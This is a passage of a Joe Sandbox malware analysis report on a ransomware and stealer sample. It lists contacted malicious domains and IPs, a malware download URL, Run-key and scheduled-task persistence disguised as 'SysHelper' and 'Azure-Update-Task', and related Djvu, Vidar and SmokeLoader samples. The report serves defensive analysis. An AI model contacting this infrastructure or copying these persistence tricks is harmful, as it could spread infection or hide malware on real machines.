00000026.00000002.2012212178.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://broadcast.st.dl.eccdnx.com	build2.exe, 00000013.00000003.1817467359.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	455F.exe, 00000014.00000003.1923072879.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	455F.exe, 00000014.00000003.1923072879.0000000003A0F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=CsP7NL79wjTK&am	build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp	false		high
https://resergvearyinitiani.shop/-	455F.exe, 00000014.00000003.1994160250.0000000001561000.00000004.00000020.00020000.00000000.sdmp, 455F.exe, 00000014.00000002.2020805404.0000000001565000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.2ip.ua/geo.jsonZL	1601.exe, 0000001D.00000002.1908938116.0000000000788000.00000004.00000020.00020000.00000000.sdmp	false		high
https://powerpoint.office.comcemberZ	explorer.exe, 00000002.00000000.1435191718.000000000CFF4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://95.216.179.73/nss3.dll6	build2.exe, 00000013.00000003.2114848022.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/workshop/	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2287228950.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.steampowered.com/	build2.exe, 00000013.00000003.1814129408.0000000000A2C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	455F.exe, 00000014.00000003.1924074897.0000000003B26000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	build2.exe, 00000013.00000003.1903065829.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1852406264.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2114989353.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2289169200.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1837113139.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1903386007.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1884071466.0000000000A26000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.1817467359.0000000000A1F000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
190.249.187.165	sdfjhuz.com	Colombia	13489	EPMTelecomunicacionesSAESPCO	true
193.106.175.76	trad-einmyus.com	Russian Federation	50465	IQHOSTRU	true
192.185.16.114	nessotechbd.com	United States	46606	UNIFIEDLAYER-AS-1US	true
95.216.179.73	unknown	Germany	24940	HETZNER-ASDE	false
142.250.217.238	drive.google.com	United States	15169	GOOGLEUS	false
189.195.132.134	sajdfue.com	Mexico	13999	MegaCableSAdeCVMX	true
103.23.232.80	m2reg.ulm.ac.id	Indonesia	58475	UNLAM-AS-IDUniversitasLambungMangkuratID	true
23.47.27.74	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
172.67.217.100	resergvearyinitiani.shop	United States	13335	CLOUDFLARENETUS	true
104.21.65.24	api.2ip.ua	United States	13335	CLOUDFLARENETUS	false
162.159.133.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1420308
Start date and time:	2024-04-04 17:47:17 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	44
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@51/210@14/11
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 90% Number of executed functions: 55 Number of non-executed functions: 178
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WerFault.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, TextInputHost.exe, StartMenuExperienceHost.exe, SearchApp.exe
Excluded IPs from analysis (whitelisted): 204.79.197.203, 20.189.173.21
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, slscr.update.microsoft.com, login.live.com, r.bing.com, a-0003.a-msedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, api-msn-com.a-0003.a-msedge.net
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: SecuriteInfo.com.W32.Kryptik.GYGF.tr.29287.4482.exe

Simulations

Behavior and APIs

Time	Type	Description
17:48:42	API Interceptor	1053x Sleep call for process: explorer.exe modified
17:48:47	Task Scheduler	Run new task: Firefox Default Browser Agent 4288E619923FDE5E path: C:\Users\user\AppData\Roaming\fcbhtea
17:48:59	Task Scheduler	Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe s>--Task
17:49:03	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart
17:49:06	API Interceptor	1x Sleep call for process: 1601.exe modified
17:49:12	API Interceptor	6x Sleep call for process: 455F.exe modified
17:49:13	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\201b1f69-e15b-4877-b27b-d2f59be149fe\1601.exe" --AutoStart
17:49:16	API Interceptor	1x Sleep call for process: build2.exe modified
17:49:22	Task Scheduler	Run new task: Azure-Update-Task path: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.106.175.76	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	trad-einmyus.com/index.php
193.106.175.76	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	trad-einmyus.com/index.php
192.185.16.114	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse
	vHpxL6E2sQ.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse
	wn1gncGy2T.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse
	noDmpaxL0x.exe	Get hash	malicious	Babuk, Djvu, Glupteba, SmokeLoader, Xehook Stealer	Browse
	doTtQFWKly.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook Stealer	Browse
	file.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook Stealer	Browse
95.216.179.73	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	Grkradw6vd.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse
	8b3ee970a1b172952a665247aa5ff590d12d8f4b33c07.exe	Get hash	malicious	GCleaner, Mars Stealer, Meduza Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse
	5zq2Yob8xh.exe	Get hash	malicious	GCleaner, Glupteba, Mars Stealer, Meduza Stealer, PureLog Stealer, RedLine, RisePro Stealer	Browse
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse
103.23.232.80	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	m2reg.ulm.ac.id/osminogs.exe
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	m2reg.ulm.ac.id/osminogs.exe
	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	m2reg.ulm.ac.id/osminogs.exe
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	m2reg.ulm.ac.id/osminogs.exe
	vHpxL6E2sQ.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	m2reg.ulm.ac.id/osminogs.exe
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	m2reg.ulm.ac.id/osminogs.exe
	wn1gncGy2T.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	m2reg.ulm.ac.id/osminogs.exe
	noDmpaxL0x.exe	Get hash	malicious	Babuk, Djvu, Glupteba, SmokeLoader, Xehook Stealer	Browse	m2reg.ulm.ac.id/osminogs.exe
	PADD8toZVX.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars Stealer	Browse	m2reg.ulm.ac.id/osminogs.exe
	MT5Um6Ykrl.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars Stealer	Browse	m2reg.ulm.ac.id/osminogs.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
m2reg.ulm.ac.id	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	103.23.232.80
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	103.23.232.80
	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	103.23.232.80
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	103.23.232.80
	vHpxL6E2sQ.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	103.23.232.80
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	103.23.232.80
	wn1gncGy2T.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	103.23.232.80
	noDmpaxL0x.exe	Get hash	malicious	Babuk, Djvu, Glupteba, SmokeLoader, Xehook Stealer	Browse	103.23.232.80
sdfjhuz.com	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	186.104.27.238
	Grkradw6vd.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	220.125.3.190
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	186.182.55.44
	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	95.86.30.3
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	189.232.22.59
	vHpxL6E2sQ.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	151.233.51.166
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	220.125.3.190
	wn1gncGy2T.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	63.143.98.185
	noDmpaxL0x.exe	Get hash	malicious	Babuk, Djvu, Glupteba, SmokeLoader, Xehook Stealer	Browse	201.229.203.107
	doTtQFWKly.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook Stealer	Browse	109.98.58.98
resergvearyinitiani.shop	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	172.67.217.100
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	172.67.217.100
	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	104.21.94.2
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	104.21.94.2
	vHpxL6E2sQ.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	172.67.217.100
	Vjt694rffx.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	172.67.217.100
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	104.21.94.2
	wn1gncGy2T.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	104.21.94.2
	PADD8toZVX.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars Stealer	Browse	172.67.217.100
	MT5Um6Ykrl.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars Stealer	Browse	104.21.94.2
sajdfue.com	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	179.27.75.59
	Grkradw6vd.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	190.249.157.249
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	151.233.51.166
	Looy Ransomware.cmd	Get hash	malicious	Babuk, Djvu	Browse	2.180.10.7
	BuThoFHNNK.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	187.199.102.130
	6uVlPQSJ4e.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	78.89.158.42
	vHpxL6E2sQ.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	211.168.53.110
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	196.22.53.110
	wn1gncGy2T.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	62.150.232.50
	noDmpaxL0x.exe	Get hash	malicious	Babuk, Djvu, Glupteba, SmokeLoader, Xehook Stealer	Browse	187.199.102.130

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
EPMTelecomunicacionesSAESPCO	wa3HVGbhyX.elf	Get hash	malicious	Mirai	Browse	181.128.127.255
	Grkradw6vd.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	190.249.157.249
	qgk516Swqn.elf	Get hash	malicious	Mirai, Moobot	Browse	181.131.208.35
	gB4Uoi2RpM.elf	Get hash	malicious	Mirai	Browse	181.132.240.83
	hIiabJsyjx.elf	Get hash	malicious	Mirai	Browse	181.134.22.203
	66yaYNheLa.elf	Get hash	malicious	Unknown	Browse	190.71.176.6
	https://att-mails-105004.weeblysite.com/	Get hash	malicious	Unknown	Browse	23.220.73.8
	K7HXpfSHdt.elf	Get hash	malicious	Mirai, Moobot	Browse	201.236.201.142
	uMqeVeoVI4.elf	Get hash	malicious	Gafgyt, Mirai	Browse	181.136.190.138
	fIupB48xS0.elf	Get hash	malicious	Gafgyt, Mirai	Browse	181.136.190.121
MegaCableSAdeCVMX	wlk8tGczl8.elf	Get hash	malicious	Mirai	Browse	177.245.113.47
	U5veaFkeQ4.elf	Get hash	malicious	Mirai	Browse	201.159.197.123
	Ai2sXygS6V.elf	Get hash	malicious	Mirai, Gafgyt	Browse	187.247.141.56
	FewiVGKGLr.elf	Get hash	malicious	Mirai, Gafgyt	Browse	187.240.129.220
	lu5n6aIYPZ.elf	Get hash	malicious	Unknown	Browse	177.245.37.127
	UApBQusqHT.elf	Get hash	malicious	Mirai	Browse	177.241.242.135
	mpsl.elf	Get hash	malicious	Mirai	Browse	177.247.228.165
	8lzQh5F8lt.elf	Get hash	malicious	Mirai	Browse	189.198.19.27
	AhbJkpk3Z8.elf	Get hash	malicious	Unknown	Browse	187.246.98.22
IQHOSTRU	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	193.106.175.76
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	193.106.175.76
	https://abhyanga.de/phpAds/adclick.php?bannerid=43&zoneid=2&source=&dest=//dev13.info/wefkerweifoj32ewds	Get hash	malicious	Phisher	Browse	193.106.174.153
	https://luhuhu.org/a67025845r19653069h12179244a93/casen89140424a9874/court/cloud/61700654621/data/documents?u822622p99=9262811683&i=ed&dmc=www.digitalelement.com&8318491a8&cmp=chambers&7033150r7	Get hash	malicious	Unknown	Browse	193.106.174.218
	Letter_q50_63b944998-11n0283407179-6803z4.js	Get hash	malicious	Unknown	Browse	193.106.174.218
	file.exe	Get hash	malicious	Unknown	Browse	193.106.174.70
	sgullhIiBr.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, PureLog Stealer	Browse	193.106.174.70
	OKaDvPJcTF.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, PureLog Stealer	Browse	193.106.174.70
	Jrkfds7rI5.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, PureLog Stealer	Browse	193.106.174.70
	dmDeFvntUL.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	193.106.174.70
HETZNER-ASDE	defender_main2.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
	defender_main.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
	eset_main2.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
	eset_main.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
	defender_main2.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
	defender_load.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
	defender_main.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
	eset_load.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
	eset_main2.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
	eset_main.exe	Get hash	malicious	Unknown	Browse	88.99.137.18
UNIFIEDLAYER-AS-1US	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	192.185.16.114
	BoTl06PDGl.exe	Get hash	malicious	FormBook	Browse	162.241.253.213
	https://babcock-wanson.smcacdeltas.org/mjestrit/xitityyhdvfgf/chibiiiogt/UcAfYL/sdarcy@babcock-wanson.com	Get hash	malicious	Unknown	Browse	192.185.111.33
	http://www.gardens-and-grounds.com	Get hash	malicious	Unknown	Browse	162.241.218.118
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	192.185.16.114
	https://nhlnkc.com/api/v1/track/link/click/63bba6a47a3f62bf2d36bda8/emails.649b108787b7027f9ddac21f?link=http://930634sxy2v0.fastfiles.co/ad/Z2lsbGVzLmdhcmNpYUBiY3AtYmFuay5jb20=	Get hash	malicious	HTMLPhisher	Browse	69.49.228.234
	https://gqx.mlg.mybluehost.me/wp-content/mu-plugins/Dalbajobas/TU17HLK/index.php?FGDD=1	Get hash	malicious	HTMLPhisher	Browse	50.87.171.205
	https://instagrmverify-account.whyudodis.com/insta/	Get hash	malicious	HTMLPhisher	Browse	192.185.29.152
	https://estaleiroarrozal.com.br/wp-admin/form/New%20ATT/bill.charged.html	Get hash	malicious	Unknown	Browse	69.49.241.20
	https://gamma.app/docs/Shared-Document-t1avmvp1d4i6t2p	Get hash	malicious	HTMLPhisher	Browse	192.185.13.17

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	95.216.179.73
	Grkradw6vd.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.216.179.73
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	95.216.179.73
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	95.216.179.73
	file.exe	Get hash	malicious	Vidar	Browse	95.216.179.73
	file.exe	Get hash	malicious	Vidar	Browse	95.216.179.73
	file.exe	Get hash	malicious	Vidar	Browse	95.216.179.73
	file.exe	Get hash	malicious	Vidar	Browse	95.216.179.73
	SecuriteInfo.com.Win32.PWSX-gen.28191.20359.exe	Get hash	malicious	Vidar	Browse	95.216.179.73
	file.exe	Get hash	malicious	Vidar	Browse	95.216.179.73
a0e9f5d64349fb13191bc781f81f42e1	defender_main2.exe	Get hash	malicious	Unknown	Browse	142.250.217.238 192.185.16.114 172.67.217.100 162.159.133.233
	defender_main.exe	Get hash	malicious	Unknown	Browse	142.250.217.238 192.185.16.114 172.67.217.100 162.159.133.233
	eset_main2.exe	Get hash	malicious	Unknown	Browse	142.250.217.238 192.185.16.114 172.67.217.100 162.159.133.233
	eset_main.exe	Get hash	malicious	Unknown	Browse	142.250.217.238 192.185.16.114 172.67.217.100 162.159.133.233
	defender_main2.exe	Get hash	malicious	Unknown	Browse	142.250.217.238 192.185.16.114 172.67.217.100 162.159.133.233
	defender_load.exe	Get hash	malicious	Unknown	Browse	142.250.217.238 192.185.16.114 172.67.217.100 162.159.133.233
	defender_main.exe	Get hash	malicious	Unknown	Browse	142.250.217.238 192.185.16.114 172.67.217.100 162.159.133.233
	eset_load.exe	Get hash	malicious	Unknown	Browse	142.250.217.238 192.185.16.114 172.67.217.100 162.159.133.233
	eset_main2.exe	Get hash	malicious	Unknown	Browse	142.250.217.238 192.185.16.114 172.67.217.100 162.159.133.233
	eset_main.exe	Get hash	malicious	Unknown	Browse	142.250.217.238 192.185.16.114 172.67.217.100 162.159.133.233
37f463bf4616ecd445d4a1937da06e19	SecuriteInfo.com.W32.Kryptik.GYGF.tr.12827.18803.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	23.47.27.74 104.21.65.24
	Grkradw6vd.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	23.47.27.74 104.21.65.24
	Google Web Designer.exe	Get hash	malicious	Mars Stealer, Vidar	Browse	23.47.27.74 104.21.65.24
	seDzEfSLFg.exe	Get hash	malicious	GuLoader	Browse	23.47.27.74 104.21.65.24
	9Gc0sRusnJ.exe	Get hash	malicious	GuLoader	Browse	23.47.27.74 104.21.65.24
	9Gc0sRusnJ.exe	Get hash	malicious	GuLoader	Browse	23.47.27.74 104.21.65.24
	KJKJJJECFI.exe	Get hash	malicious	Amadey	Browse	23.47.27.74 104.21.65.24
	WAhYftpepO.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, SmokeLoader, Vidar	Browse	23.47.27.74 104.21.65.24
	file.exe	Get hash	malicious	Unknown	Browse	23.47.27.74 104.21.65.24
